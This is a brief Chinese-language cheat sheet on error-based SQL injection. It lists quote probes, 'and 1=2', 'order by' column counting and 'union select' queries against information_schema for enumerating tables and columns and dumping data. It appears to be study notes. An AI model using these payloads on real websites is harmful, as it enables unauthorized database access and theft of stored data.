一、显错注入
‘
“
‘）
“）

– qwe

and 1=2

上面的单引号和下面的and 1=2打组合拳

order by 数字 判断字段数

union select 1,2,3……联合查询
table_name from information_schema.tables where table_schema=database() //得到表名
column_name from information_schema.columns where table_schema=database() and table_name=‘表名’ limit 0,1 //得到字段名
select 字段名 from 表名